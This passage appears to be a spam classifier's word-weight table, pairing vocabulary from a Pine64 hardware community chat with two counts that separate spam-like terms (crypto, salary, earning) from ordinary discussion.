"white": [38590, 26945], "vans": [65535, 0], "spawned": [65535, 0], "crypto": [4391, 61144], "porkyofthepine": [65535, 0], "unlimited": [65535, 0], "ancient": [65535, 0], "pinea": [65535, 0], "uboot": [65535, 0], "boot": [65535, 0], "dkms": [65535, 0], "wayland": [65535, 0], "driver": [65535, 0], "mali": [65535, 0], "utgard": [65535, 0], "errquilibria": [65535, 0], "strit": [65535, 0], "guide": [58198, 7337], "uuuuh": [65535, 0], "llvmpipe": [65535, 0], "lima": [65535, 0], "rest": [65535, 0], "mainline": [65535, 0], "kernel": [65535, 0], "sunxi": [65535, 0], "smoothest": [65535, 0], "graphic": [65535, 0], "acceleration": [65535, 0], "large": [20045, 45490], "resolution": [65535, 0], "picked": [65535, 0], "llvm": [65535, 0], "automatically": [65535, 0], "gamiee": [65535, 0], "differ": [65535, 0], "zgrep": [65535, 0], "proc": [65535, 0], "gz": [65535, 0], "understand": [45076, 20459], "late": [47550, 17985], "pm": [14881, 50654], "tomorrow": [37311, 28224], "solong": [65535, 0], "tho": [65535, 0], "bought": [57395, 8140], "never": [25359, 40176], "explanation": [65535, 0], "fake": [30700, 34835], "pretends": [65535, 0], "won't": [44348, 21187], "receive": [22090, 43445], "item": [65535, 0], "several": [65535, 0], "flyfrog": [65535, 0], "placed": [65535, 0], "passed": [65535, 0], "times": [43011, 22524], "answered": [65535, 0], "began": [11832, 53703], "worry": [65535, 0], "august": [65535, 0], "definitely": [52338, 13197], "http": [35693, 29842], "answer": [65535, 0], "within": [14152, 51383], "ping": [65535, 0], "thank": [37558, 27977], "curiosity": [37311, 28224], "easy": [41165, 24370], "unbootable": [20045, 45490], "wrong": [53414, 12121], "partition": [65535, 0], "scheme": [11832, 53703], "deleting": [65535, 0], "u": [40734, 24801], "bootloader": [65535, 0], "gave": [28988, 36547], "anxiety": [65535, 0], "happy": [36019, 29516], "heart": [65535, 0], "banned": [65535, 0], "load": [16047, 49488], "effectively": [65535, 0], "unbrickable": [65535, 0], "tricky": [65535, 0], "they'll": [65535, 0], "emmc": [65535, 0], "physical": [65535, 0], "included": [65535, 0], "disconnects": [65535, 0], "spi": [65535, 0], "reassurance": [65535, 0], "flash": [65535, 0], "cmon": [65535, 0], "everybody": [65535, 0], "russia": [41813, 23722], "waydroid": [65535, 0], "whyamilikethis": [65535, 0], "wip": [65535, 0], "mp": [65535, 0], "caleb": [65535, 0], "fontenot": [65535, 0], "him": [12798, 52737], "doesnt": [65535, 0], "web": [37311, 28224], "client": [65535, 0], "useragent": [65535, 0], "blocks": [65535, 0], "form": [41813, 23722], "access": [43565, 21970], "teh": [65535, 0], "community": [65535, 0], "poking": [65535, 0], "changer": [65535, 0], "addons": [65535, 0], "per": [32627, 32908], "basis": [37311, 28224], "firefox": [65535, 0], "chrom": [65535, 0], "um": [20045, 45490], "havent": [45076, 20459], "checking": [65535, 0], "anglefish": [65535, 0], "friendly": [65535, 0], "falkon": [65535, 0], "yea": [65535, 0], "mine": [54327, 11208], "around": [44093, 21442], "seeign": [65535, 0], "bfore": [65535, 0], "multi": [45076, 20459], "messed": [65535, 0], "didnt": [65535, 0], "pay": [43011, 22524], "watch": [45973, 19562], "ill": [65535, 0], "costs": [65535, 0], "desktop": [65535, 0], "style": [65535, 0], "tabs": [65535, 0], "extensions": [65535, 0], "dual": [65535, 0], "adapter": [65535, 0], "forwarded": [1683, 63852], "derek": [65535, 0], "especially": [65535, 0], "backups": [65535, 0], "major": [65535, 0], "hopefully": [65535, 0], "arrive": [65535, 0], "soy": [65535, 0], "hablo": [65535, 0], "fine": [65535, 0], "tabasco": [65535, 0], "ketchup": [65535, 0], "editing": [65535, 0], "agent": [65535, 0], "replace": [65535, 0], "websites": [65535, 0], "stop": [32009, 33526], "harass": [65535, 0], "present": [65535, 0], "uis": [65535, 0], "install": [65535, 0], "switcher": [65535, 0], "sites": [41813, 23722], "detect": [65535, 0], "presence": [65535, 0], "changing": [20045, 45490], "amount": [13401, 52134], "change": [35149, 30386], "string": [65535, 0], "contains": [65535, 0], "word": [65535, 0], "appears": [65535, 0], "encountered": [20045, 45490], "thus": [37311, 28224], "relying": [65535, 0], "dimensions": [65535, 0], "buddy": [65535, 0], "eu": [65535, 0], "privacy": [65535, 0], "resistfingerprinting": [65535, 0], "that'll": [65535, 0], "windows": [65535, 0], "nt": [20045, 45490], "yerbkhan": [65535, 0], "separately": [65535, 0], "unfortunately": [65535, 0], "arbitrary": [65535, 0], "package": [65535, 0], "noy": [65535, 0], "fair": [28988, 36547], "warehouse": [65535, 0], "apply": [26080, 39455], "holding": [30700, 34835], "stock": [38763, 26772], "process": [30700, 34835], "region": [65535, 0], "wait": [48576, 16959], "assumed": [65535, 0], "decide": [39757, 25778], "shill": [65535, 0], "experience": [35905, 29630], "gent": [65535, 0], "huh": [65535, 0], "annoying": [65535, 0], "reddit": [65535, 0], "thrust": [65535, 0], "upon": [30700, 34835], "xd": [65535, 0], "put": [45076, 20459], "that'd": [65535, 0], "personally": [65535, 0], "accurate": [39757, 25778], "ti": [65535, 0], "stops": [65535, 0], "shilling": [65535, 0], "significantly": [65535, 0], "improves": [65535, 0], "yo": [65535, 0], "coin": [5762, 59773], "toss": [65535, 0], "buying": [65535, 0], "familiar": [65535, 0], "interfaces": [65535, 0], "front": [65535, 0], "repositories": [65535, 0], "io": [65535, 0], "neural": [65535, 0], "npu": [8393, 57142], "side": [65535, 0], "advice": [65535, 0], "programmerall": [65535, 0], "google": [65535, 0], "answers": [65535, 0], "technical": [39757, 25778], "complicated": [65535, 0], "pleasure": [20045, 45490], "written": [65535, 0], "piece": [65535, 0], "tech": [33223, 32312], "journalism": [65535, 0], "hard": [47550, 17985], "cares": [65535, 0], "globally": [65535, 0], "accessible": [65535, 0], "pointed": [65535, 0], "spambot": [65535, 0], "tor": [65535, 0], "blasted": [65535, 0], "clients": [30700, 34835], "somehow": [65535, 0], "across": [16279, 49256], "normally": [65535, 0], "wasn't": [55113, 10422], "whispers": [65535, 0], "dms": [65535, 0], "abcde": [65535, 0], "ops": [65535, 0], "cross": [65535, 0], "logs": [65535, 0], "you'll": [45076, 20459], "shit": [50048, 15487], "ton": [30700, 34835], "joins": [65535, 0], "users": [65535, 0], "names": [65535, 0], "master": [65535, 0], "advertise": [65535, 0], "turkish": [65535, 0], "dating": [65535, 0], "kidding": [65535, 0], "quit": [14881, 50654], "bots": [65535, 0], "weren't": [65535, 0], "spamming": [65535, 0], "flood": [65535, 0], "keyboard": [65535, 0], "mashing": [65535, 0], "confusing": [65535, 0], "job": [17602, 47933], "screenshot": [65535, 0], "screws": [65535, 0], "joining": [8393, 57142], "vpn": [65535, 0], "authentication": [65535, 0], "sasl": [65535, 0], "lolwhat": [65535, 0], "byeee": [65535, 0], "kicking": [65535, 0], "printable": [65535, 0], "characters": [65535, 0], "unicode": [65535, 0], "xfffd": [65535, 0], "literal": [65535, 0], "name": [32988, 32547], "'replacement": [65535, 0], "character'": [65535, 0], "text": [55113, 10422], "padding": [65535, 0], "fail": [65535, 0], "line": [65535, 0], "failed": [58198, 7337], "top": [34352, 31183], "head": [65535, 0], "suspend": [65535, 0], "nickserv": [65535, 0], "login": [49491, 16044], "libera": [65535, 0], "recurring": [65535, 0], "higher": [30700, 34835], "priority": [65535, 0], "finding": [30700, 34835], "else's": [65535, 0], "taken": [34352, 31183], "maliciously": [65535, 0], "uncommon": [65535, 0], "verify": [20045, 45490], "captcha": [65535, 0], "native": [65535, 0], "feature": [65535, 0], "afaik": [65535, 0], "ahh": [65535, 0], "digging": [65535, 0], "little": [35561, 29974], "deeper": [65535, 0], "atm": [65535, 0], "implement": [65535, 0], "we'd": [65535, 0], "blacklist": [65535, 0], "consistent": [65535, 0], "backfire": [65535, 0], "legit": [10166, 55369], "hm": [65535, 0], "excuse": [65535, 0], "weekend": [65535, 0], "straightforward": [65535, 0], "catching": [65535, 0], "delete": [65535, 0], "classifier": [65535, 0], "matterbridge": [65535, 0], "compile": [65535, 0], "hardcoded": [65535, 0], "delay": [24254, 41281], "ideal": [65535, 0], "worries": [65535, 0], "mit": [20045, 45490], "controls": [65535, 0], "deployment": [65535, 0], "anywhere": [65535, 0], "expand": [65535, 0], "scope": [65535, 0], "necessary": [65535, 0], "gets": [65535, 0], "short": [53414, 12121], "stick": [65535, 0], "race": [65535, 0], "condition": [65535, 0], "set": [51053, 14482], "action": [45076, 20459], "polls": [65535, 0], "either": [65535, 0], "api": [65535, 0], "ya": [41813, 23722], "filter": [65535, 0], "images": [65535, 0], "matching": [65535, 0], "checksum": [65535, 0], "damn": [65535, 0], "elon": [1566, 63969], "musk": [2321, 63214], "screenshots": [65535, 0], "checked": [65535, 0], "clusterboard": [65535, 0], "atx": [65535, 0], "geekbench": [65535, 0], "invasion": [20045, 45490], "eat": [30700, 34835], "dinner": [65535, 0], "rice": [65535, 0], "notthatdarnfrogagain": [65535, 0], "videos": [55113, 10422], "spammy": [65535, 0], "spammiest": [65535, 0], "perfect": [65535, 0], "attached": [11832, 53703], "nearly": [65535, 0], "years": [55113, 10422], "docker": [65535, 0], "containers": [65535, 0], "assistant": [65535, 0], "bits": [37311, 28224], "pieces": [65535, 0], "self": [65535, 0], "inflicted": [65535, 0], "nvidia": [65535, 0], "cpus": [65535, 0], "suspecting": [65535, 0], "gaming": [65535, 0], "levels": [65535, 0], "poland": [65535, 0], "ye": [65535, 0], "morning": [37311, 28224], "gmt": [65535, 0], "preferred": [65535, 0], "hdmi": [65535, 0], "tv": [65535, 0], "disable": [65535, 0], "overscan": [65535, 0], "armbianenv": [65535, 0], "txt": [65535, 0], "seagate": [65535, 0], "expansion": [65535, 0], "plugged": [65535, 0], "bulk": [65535, 0], "samsung": [65535, 0], "riser": [65535, 0], "secondary": [65535, 0], "evo": [65535, 0], "backup": [65535, 0], "typec": [65535, 0], "else": [41813, 23722], "poor": [65535, 0], "fix": [45076, 20459], "ain't": [65535, 0], "broke": [65535, 0], "xusb": [65535, 0], "intended": [65535, 0], "video": [53734, 11801], "music": [65535, 0], "saturate": [65535, 0], "rp": [65535, 0], "common": [65535, 0], "powered": [65535, 0], "solar": [65535, 0], "battery": [65535, 0], "supply": [65535, 0], "type": [17779, 47756], "hub": [11832, 53703], "pair": [65535, 0], "offline": [65535, 0], "adage": [65535, 0], "taxes": [65535, 0], "live": [30700, 34835], "delaware": [65535, 0], "hundred": [11832, 53703], "bucks": [65535, 0], "slapped": [65535, 0], "yikes": [65535, 0], "healthcare": [65535, 0], "chatbox": [65535, 0], "sending": [16279, 49256], "book": [65535, 0], "sold": [65535, 0], "person": [32627, 32908], "country": [49491, 16044], "buyer": [65535, 0], "lives": [22668, 42867], "ukraine": [20045, 45490], "ideasquarebased": [65535, 0], "import": [65535, 0], "wherever": [65535, 0], "tax": [65535, 0], "evasion": [65535, 0], "countries": [65535, 0], "services": [45076, 20459], "block": [30700, 34835], "alyssarzg": [65535, 0], "til": [65535, 0], "healthy": [65535, 0], "memory": [65535, 0], "trouble": [65535, 0], "knowing": [65535, 0], "paid": [18949, 46586], "required": [65535, 0], "spicyoreo": [65535, 0], "aware": [65535, 0], "duty": [65535, 0], "tariff": [65535, 0], "imposed": [65535, 0], "goods": [65535, 0], "transported": [65535, 0], "borders": [65535, 0], "american": [20045, 45490], "returned": [65535, 0], "agr": [65535, 0], "declared": [65535, 0], "must": [47181, 18354], "prepared": [65535, 0], "prove": [30700, 34835], "border": [65535, 0], "protection": [65535, 0], "articles": [65535, 0], "rate": [47550, 17985], "percentage": [65535, 0], "cbp": [65535, 0], "gov": [65535, 0], "travel": [65535, 0], "kbyg": [65535, 0], "visitors": [65535, 0], "helpful": [41813, 23722], "whatever": [65535, 0], "bud": [65535, 0], "transit": [65535, 0], "airport": [65535, 0], "arrived": [65535, 0], "postal": [65535, 0], "routing": [65535, 0], "afraid": [41813, 23722], "gahhh": [65535, 0], "hate": [65535, 0], "places": [65535, 0], "usps": [65535, 0], "ups": [65535, 0], "couriers": [65535, 0], "finally": [51053, 14482], "phos": [65535, 0], "runs": [65535, 0], "alot": [5308, 60227], "majaro": [65535, 0], "brave": [65535, 0], "le": [65535, 0], "lion": [65535, 0], "recommendation": [11832, 53703], "utilize": [65535, 0], "prefer": [65535, 0], "lokinet": [65535, 0], "regardless": [65535, 0], "exit": [65535, 0], "nodes": [30700, 34835], "comped": [65535, 0], "joined": [65535, 0], "configure": [65535, 0], "tab": [65535, 0], "bar": [20045, 45490], "userchrome": [65535, 0], "css": [65535, 0], "awesome": [40196, 25339], "argentina": [65535, 0], "knoowwwww": [65535, 0], "constantly": [65535, 0], "programming": [65535, 0], "python": [65535, 0], "py": [3059, 62476], "request": [26080, 39455], "shipment": [65535, 0], "handed": [65535, 0], "final": [65535, 0], "acceptance": [65535, 0], "confirmed": [65535, 0], "ready": [41813, 23722], "advised": [65535, 0], "postnl": [65535, 0], "shippers": [65535, 0], "scraper": [65535, 0], "dop": [65535, 0], "nevermind'": [65535, 0], "annoyingly": [65535, 0], "watched": [65535, 0], "pot": [65535, 0], "boils": [65535, 0], "announcement": [65535, 0], "expect": [37311, 28224], "null": [65535, 0], "feel": [41813, 23722], "betrayed": [65535, 0], "random": [65535, 0], "coming": [45076, 20459], "mr": [4387, 61148], "yn": [65535, 0], "fire": [65535, 0], "one's": [65535, 0], "sad": [65535, 0], "pinecone": [65535, 0], "nutcracker": [65535, 0], "forward": [28988, 36547], "smart": [41813, 23722], "speaker": [65535, 0], "iu": [65535, 0], "pinegirlfiend": [65535, 0], "great": [29494, 36041], "gf": [65535, 0], "lads": [65535, 0], "pin": [65535, 0], "compatible": [65535, 0], "datasheets": [65535, 0], "certainly": [45076, 20459], "peripherals": [65535, 0], "means": [65535, 0], "pins": [65535, 0], "wanted": [39303, 26232], "designing": [65535, 0], "aliexpress": [65535, 0], "huys": [65535, 0], "cancel": [65535, 0], "terms": [51053, 14482], "details": [21396, 44139], "okk": [65535, 0], "road": [65535, 0], "receiving": [33223, 32312], "bach": [65535, 0], "hour": [30700, 34835], "versiob": [65535, 0], "tomorow": [65535, 0], "starts": [65535, 0], "november": [65535, 0], "gonna": [56394, 9141], "realease": [65535, 0], "read": [65535, 0], "pinephonepro": [65535, 0], "announce": [65535, 0], "jptagaio": [65535, 0], "discussions": [65535, 0], "listening": [30700, 34835], "availability": [65535, 0], "q": [33685, 31850], "column": [65535, 0], "year": [22782, 42753], "processor": [65535, 0], "raspberry": [65535, 0], "pie": [65535, 0], "pi": [45076, 20459], "pleeeaasseee": [65535, 0], "steam": [31828, 33707], "deck": [65535, 0], "quarter": [65535, 0], "pros": [65535, 0], "input": [65535, 0], "release": [65535, 0], "window": [65535, 0], "explorer": [65535, 0], "edition": [65535, 0], "whenever": [11832, 53703], "half": [52338, 13197], "remember": [65535, 0], "subscribing": [65535, 0], "cryptocurrency": [5654, 59881], "interview": [65535, 0], "ppp": [65535, 0], "luke": [65535, 0], "knew": [20045, 45490], "saying": [37311, 28224], "claimed": [65535, 0], "gotten": [32627, 32908], "inventory": [65535, 0], "weather": [65535, 0], "shortage": [65535, 0], "ps": [65535, 0], "situation": [65535, 0], "archlinux": [65535, 0], "yeahh": [65535, 0], "rolling": [65535, 0], "sketches": [65535, 0], "proxmox": [65535, 0], "debian": [65535, 0], "rely": [65535, 0], "breaks": [65535, 0], "minecraft": [65535, 0], "couch": [65535, 0], "introducing": [65535, 0], "pal": [65535, 0], "infinite": [65535, 0], "dns": [65535, 0], "validate": [65535, 0], "chain": [65535, 0], "sustainable": [65535, 0], "brand": [65535, 0], "logo": [65535, 0], "guidelines": [65535, 0], "whom": [65535, 0], "commercial": [65535, 0], "allowable": [65535, 0], "trademarks": [65535, 0], "term": [65535, 0], "likelihood": [65535, 0], "confusion": [65535, 0], "g": [35771, 29764], "tested": [65535, 0], "generally": [65535, 0], "speaking": [65535, 0], "usable": [65535, 0], "circumstances": [65535, 0], "include": [65535, 0], "section": [45076, 20459], "mug": [65535, 0], "permission": [65535, 0], "logotype": [65535, 0], "derivatives": [65535, 0], "alterade": [65535, 0], "logotypes": [65535, 0], "permitted": [65535, 0], "prior": [65535, 0], "consent": [65535, 0], "ltd": [33223, 32312], "merchandise": [65535, 0], "vendor": [65535, 0], "endeavour": [65535, 0], "seeks": [65535, 0], "financial": [9153, 56382], "profit": [3592, 61943], "acquire": [65535, 0], "appropriate": [65535, 0], "companies": [65535, 0], "require": [65535, 0], "approval": [65535, 0], "trademark": [65535, 0], "'compatible": [65535, 0], "'": [37311, 28224], "microsoft's": [65535, 0], "allowed": [65535, 0], "classes": [65535, 0], "referencing": [65535, 0], "alleged": [65535, 0], "infringer": [65535, 0], "assert": [65535, 0], "defenses": [65535, 0], "collateral": [65535, 0], "allows": [65535, 0], "commentary": [65535, 0], "criticism": [65535, 0], "incidentally": [65535, 0], "involves": [65535, 0], "cornell": [65535, 0], "edu": [65535, 0], "wex": [65535, 0], "infringement": [65535, 0], "brief": [20045, 45490], "overview": [65535, 0], "discussed": [65535, 0], "severely": [65535, 0], "misbehaving": [65535, 0], "panuozzo": [65535, 0], "fits": [65535, 0], "edit": [65535, 0], "cards": [65535, 0], "proprietary": [65535, 0], "format": [65535, 0], "shouldn't": [65535, 0], "wants": [65535, 0], "truly": [14881, 50654], "solution": [65535, 0], "nor": [65535, 0], "reasonable": [65535, 0], "litmus": [65535, 0], "throw": [65535, 0], "stare": [65535, 0], "soc's": [65535, 0], "mode": [56394, 9141], "rush": [65535, 0], "hexchat": [65535, 0], "logging": [65535, 0], "nope": [65535, 0], "ought": [65535, 0], "mention": [65535, 0], "preventive": [65535, 0], "reactive": [65535, 0], "invites": [65535, 0], "beyond": [20045, 45490], "obscurity": [65535, 0], "noise": [65535, 0], "groups": [20045, 45490], "sizes": [65535, 0], "rid": [65535, 0], "portion": [65535, 0], "programmed": [65535, 0], "lazily": [65535, 0], "gmail": [65535, 0], "inbox": [5308, 60227], "scale": [37311, 28224], "congratulations": [6503, 59032], "goal": [30700, 34835], "clean": [65535, 0], "mongodb": [65535, 0], "production": [51053, 14482], "living": [20045, 45490], "korea": [65535, 0], "dispatch": [65535, 0], "haven": [65535, 0], "estimate": [65535, 0], "kj": [65535, 0], "rrv": [65535, 0], "seeing": [17081, 48454], "inspired": [30700, 34835], "electrical": [65535, 0], "engineer": [65535, 0], "describe": [65535, 0], "pick": [65535, 0], "special": [65535, 0], "websites'": [65535, 0], "code": [57395, 8140], "mybb": [65535, 0], "mediawiki": [65535, 0], "triplr": [65535, 0], "referring": [41813, 23722], "context": [65535, 0], "missing": [65535, 0], "serial": [65535, 0], "sale": [65535, 0], "pinecil": [65535, 0], "havnt": [65535, 0], "adjusted": [65535, 0], "suggestions": [65535, 0], "token": [65535, 0], "ban": [30700, 34835], "cchat": [65535, 0], "gtk": [65535, 0], "actively": [65535, 0], "against": [65535, 0], "tos": [65535, 0], "bunch": [65535, 0], "js": [65535, 0], "anbox": [65535, 0], "ass": [65535, 0], "collect": [65535, 0], "analytics": [65535, 0], "science": [65535, 0], "url": [65535, 0], "slowly": [65535, 0], "official": [37311, 28224], "managed": [65535, 0], "decompile": [65535, 0], "automation": [65535, 0], "accounts": [65535, 0], "hear": [53414, 12121], "thoughi": [65535, 0], "till": [26080, 39455], "pp": [65535, 0], "camne": [65535, 0], "amd": [65535, 0], "daily": [20806, 44729], "drove": [65535, 0], "electron": [65535, 0], "wrapper": [65535, 0], "heard": [65535, 0], "decently": [65535, 0], "loads": [65535, 0], "streaming": [65535, 0], "detecting": [65535, 0], "presses": [65535, 0], "push": [65535, 0], "supposed": [65535, 0], "supposedly": [65535, 0], "roadmap": [65535, 0], "beat": [65535, 0], "someone's": [65535, 0], "powkiddy": [65535, 0], "portable": [65535, 0], "game": [26080, 39455], "console": [65535, 0], "bet": [65535, 0], "ive": [65535, 0], "footprint": [65535, 0], "punched": [65535, 0], "massive": [20045, 45490], "pain": [65535, 0], "upload": [65535, 0], "somewhere": [65535, 0], "kicad": [65535, 0], "libraries": [65535, 0], "lib": [65535, 0], "bga": [65535, 0], "powering": [65535, 0], "indeed": [39757, 25778], "rainproof": [65535, 0], "arnavion": [65535, 0], "planning": [65535, 0], "rain": [65535, 0], "vincent": [37311, 28224], "houses": [65535, 0], "ventyl": [65535, 0], "cat": [65535, 0], "pic": [65535, 0], "regular": [65535, 0], "aah": [65535, 0], "typo": [65535, 0], "hosteboards": [65535, 0], "updatefollowup": [65535, 0], "hostboards": [65535, 0], "cannot": [41813, 23722], "refreshing": [65535, 0], "day": [32487, 33048], "dm": [36525, 29010], "crafty": [65535, 0], "gah": [65535, 0], "salvaged": [65535, 0], "appreciate": [20045, 45490], "adding": [65535, 0], "broken": [65535, 0], "isnt": [65535, 0], "basic": [65535, 0], "nuked": [65535, 0], "spare": [65535, 0], "added": [65535, 0], "fixed": [65535, 0], "propagate": [65535, 0], "fellas": [65535, 0], "finished": [65535, 0], "inputting": [65535, 0], "soc": [65535, 0], "adrian's": [65535, 0], "digital": [20045, 45490], "basement": [65535, 0], "kick": [65535, 0], "lower": [65535, 0], "usual": [65535, 0], "mouser": [65535, 0], "digikey": [65535, 0], "dormito": [65535, 0], "decade": [65535, 0], "proper": [37311, 28224], "scroll": [65535, 0], "heterogeneous": [65535, 0], "processing": [65535, 0], "scared": [27750, 37785], "conf": [65535, 0], "nano": [65535, 0], "ctrl": [65535, 0], "function": [65535, 0], "icon": [65535, 0], "ngl": [65535, 0], "mark": [18237, 47298], "radxa": [65535, 0], "zero": [65535, 0], "banana": [65535, 0], "outdated": [5308, 60227], "builds": [65535, 0], "'boot'": [65535, 0], "application": [65535, 0], "research": [65535, 0], "picking": [65535, 0], "roll": [65535, 0], "distros": [65535, 0], "gripe": [65535, 0], "display": [65535, 0], "dp": [60274, 5261], "barely": [65535, 0], "worked": [65535, 0], "felt": [65535, 0], "garbage": [65535, 0], "verifying": [65535, 0], "flashing": [65535, 0], "mirrored": [65535, 0], "lately": [65535, 0], "continue": [28534, 37001], "path": [65535, 0], "despite": [20045, 45490], "dsimic's": [65535, 0], "disagreement": [65535, 0], "'own'": [65535, 0], "write": [21983, 43552], "antbox": [65535, 0], "choice": [65535, 0], "exposed": [65535, 0], "gpio": [65535, 0], "bitbanging": [65535, 0], "drop": [37311, 28224], "less": [40196, 25339], "resolutions": [65535, 0], "displays": [65535, 0], "lagging": [65535, 0], "utilizes": [65535, 0], "clocking": [65535, 0], "cortex": [65535, 0], "ghz": [65535, 0], "forgotten": [65535, 0], "figured": [65535, 0], "nicely": [65535, 0], "original": [65535, 0], "upgrade": [65535, 0], "addition": [65535, 0], "fab": [65535, 0], "pcb": [65535, 0], "breakout": [65535, 0], "connectors": [65535, 0], "alas": [65535, 0], "luck": [65535, 0], "crucified": [65535, 0], "suggesting": [65535, 0], "rpi": [65535, 0], "unofficial": [65535, 0], "lineage": [65535, 0], "worse": [65535, 0], "infact": [65535, 0], "vim": [65535, 0], "mipi": [65535, 0], "dsi": [65535, 0], "haha": [65535, 0], "initially": [20045, 45490], "lvds": [65535, 0], "edp": [65535, 0], "dts": [65535, 0], "opposite": [65535, 0], "ptn": [65535, 0], "wow": [37965, 27570], "outputs": [65535, 0], "diy'd": [65535, 0], "complicate": [65535, 0], "heavily": [65535, 0], "armbian": [65535, 0], "wise": [30700, 34835], "causes": [65535, 0], "drivers": [65535, 0], "html": [65535, 0], "spm": [65535, 0], "ipjco": [65535, 0], "dtbo": [65535, 0], "dtbos": [65535, 0], "aren't": [65535, 0], "listing": [65535, 0], "title": [65535, 0], "description": [30700, 34835], "listings": [65535, 0], "mainboard": [65535, 0], "cables": [65535, 0], "solve": [65535, 0], "wanting": [65535, 0], "worth": [45076, 20459], "effort": [27099, 38436], "honest": [33685, 31850], "lack": [65535, 0], "increase": [20045, 45490], "reliably": [65535, 0], "alt": [65535, 0], "bsp": [65535, 0], "noticed": [26080, 39455], "spin": [65535, 0], "considering": [37311, 28224], "talked": [65535, 0], "'newer'": [65535, 0], "worng": [65535, 0], "cabling": [65535, 0], "standardized": [65535, 0], "flat": [65535, 0], "flex": [65535, 0], "connector": [65535, 0], "looked": [65535, 0], "typically": [65535, 0], "terminate": [65535, 0], "went": [30700, 34835], "panel": [65535, 0], "sitting": [65535, 0], "straight": [65535, 0], "hungry": [65535, 0], "noone's": [65535, 0], "schematic": [65535, 0], "regulator": [65535, 0], "def": [65535, 0], "guessing": [65535, 0], "concerned": [65535, 0], "backlight": [65535, 0], "consumption": [65535, 0], "datasheet": [65535, 0], "given": [41813, 23722], "signage": [65535, 0], "driven": [65535, 0], "supplied": [65535, 0], "additional": [30700, 34835], "stupid": [65535, 0], "draw": [65535, 0], "vcca": [65535, 0], "vcc": [65535, 0], "dvp": [65535, 0], "feed": [65535, 0], "edpauxp": [65535, 0], "backlights": [65535, 0], "beefier": [65535, 0], "rail": [65535, 0], "draws": [65535, 0], "apparently": [65535, 0], "worried": [65535, 0], "brick": [65535, 0], "task": [65535, 0], "panels": [65535, 0], "w": [41429, 24106], "inputs": [65535, 0], "doubt": [49491, 16044], "rated": [65535, 0], "wattage": [65535, 0], "sign": [34352, 31183], "logic": [65535, 0], "generic": [65535, 0], "aliexp": [65535, 0], "pass": [65535, 0], "pinout": [65535, 0], "ignorance": [65535, 0], "tool": [65535, 0], "etcher": [65535, 0], "match": [65535, 0], "flashed": [65535, 0], "niiice": [65535, 0], "rabbit": [65535, 0], "hole": [65535, 0], "implemented": [65535, 0], "judging": [65535, 0], "crap": [65535, 0], "'it's": [65535, 0], "things'": [65535, 0], "guy": [41813, 23722], "jumped": [65535, 0], "conversation": [65535, 0], "scrollback": [65535, 0], "somewhat": [65535, 0], "discovered": [41813, 23722], "daughterboard": [65535, 0], "wide": [65535, 0], "designed": [65535, 0], "externally": [65535, 0], "knowledgeable": [65535, 0], "sysadmin": [65535, 0], "nerve": [65535, 0], "racking": [65535, 0], "'if": [65535, 0], "blink": [65535, 0], "works'": [65535, 0], "establish": [65535, 0], "except": [65535, 0], "tells": [65535, 0], "spl": [65535, 0], "powers": [65535, 0], "lighting": [65535, 0], "loaded": [65535, 0], "started": [23869, 41666], "spinning": [65535, 0], "excited": [8393, 57142], "enamored": [65535, 0], "impatiently": [65535, 0], "waited": [11832, 53703], "press": [65535, 0], "docs": [65535, 0], "sparse": [65535, 0], "archaic": [65535, 0], "realized": [65535, 0], "auto": [65535, 0], "resize": [65535, 0], "partitions": [65535, 0], "unfortunate": [65535, 0], "skeptical": [65535, 0], "advertised": [65535, 0], "'unofficial'": [65535, 0], "organized": [65535, 0], "deceiving": [65535, 0], "bastards": [65535, 0], "tiny": [65535, 0], "minority": [65535, 0], "needing": [65535, 0], "honestly": [39757, 25778], "reeee": [65535, 0], "impact": [65535, 0], "complication": [65535, 0], "compares": [65535, 0], "dodgy": [65535, 0], "downclocked": [65535, 0], "lame": [65535, 0], "blob": [65535, 0], "chineese": [65535, 0], "posts": [20045, 45490], "github": [65535, 0], "personal": [37311, 28224], "improved": [65535, 0], "deal": [38990, 26545], "fwiw": [65535, 0], "unreliable": [65535, 0], "reliability": [14881, 50654], "performs": [65535, 0], "virtual": [65535, 0], "pinball": [65535, 0], "quick": [57395, 8140], "magic": [65535, 0], "dmd": [65535, 0], "dot": [65535, 0], "monitor": [65535, 0], "renders": [65535, 0], "'presentation": [65535, 0], "api'": [65535, 0], "onto": [37311, 28224], "area": [65535, 0], "'play": [65535, 0], "field'": [65535, 0], "ball": [65535, 0], "moving": [39757, 25778], "emulates": [65535, 0], "roms": [65535, 0], "heavier": [65535, 0], "compute": [65535, 0], "involved": [20045, 45490], "performed": [65535, 0], "seemed": [65535, 0], "functional": [65535, 0], "curious": [65535, 0], "ones": [45076, 20459], "experiment": [65535, 0], "eagerly": [65535, 0], "awaiting": [65535, 0], "tonight": [65535, 0], "stays": [65535, 0], "feedback": [65535, 0], "mechanisms": [65535, 0], "solenoids": [65535, 0], "accepts": [65535, 0], "mechanism": [65535, 0], "fired": [65535, 0], "bumpers": [65535, 0], "slingshots": [65535, 0], "expected": [20045, 45490], "gyro": [65535, 0], "hooked": [65535, 0], "'discovered'": [65535, 0], "'problems'": [65535, 0], "isolated": [65535, 0], "kernels": [65535, 0], "program": [23277, 42258], "perfectly": [65535, 0], "complaining": [65535, 0], "hurt": [65535, 0], "idc": [65535, 0], "jst": [65535, 0], "converted": [65535, 0], "dump": [65535, 0], "'new'": [65535, 0], "'plug": [65535, 0], "play'": [65535, 0], "clarification": [65535, 0], "distorted": [65535, 0], "green": [20045, 45490], "depend": [9820, 55715], "smartphones": [65535, 0], "canyour": [65535, 0], "salary": [3421, 62114], "earning": [3171, 62364], "weekly": [10936, 54599], "below": [5136, 60399], "hannahmartins": [65535, 0], "fx": [3881, 61654], "updated": [65535, 0], "bindings": [65535, 0], "clue": [65535, 0], "jaguar": [65535, 0], "december": [37311, 28224], "megi": [65535, 0], "variant": [65535, 0], "limited": [37311, 28224], "estimates": [65535, 0], "directions": [65535, 0], "bluetooth": [65535, 0], "headphone": [65535, 0], "capability": [65535, 0], "granted": [65535, 0], "ve": [65535, 0], "mic": [65535, 0], "headphones": [65535, 0], "stack": [65535, 0], "audiobooks": [65535, 0], "call": [65535, 0], "sound": [65535, 0], "pribiet": [65535, 0], "priviet": [65535, 0], "shipments": [65535, 0], "dock": [65535, 0], "cody": [65535, 0], "underneath": [65535, 0], "plastic": [65535, 0], "shell": [65535, 0], "lays": [65535, 0], "laughliz": [65535, 0], "idiot": [65535, 0], "admin": [11076, 54459], "report": [49491, 16044], "gqnbzv": [65535, 0], "sales": [65535, 0], "requesting": [65535, 0], "team": [20045, 45490], "representatives": [65535, 0], "mishaps": [65535, 0], "minutes": [65535, 0], "stating": [65535, 0], "nd": [65535, 0], "notice": [37311, 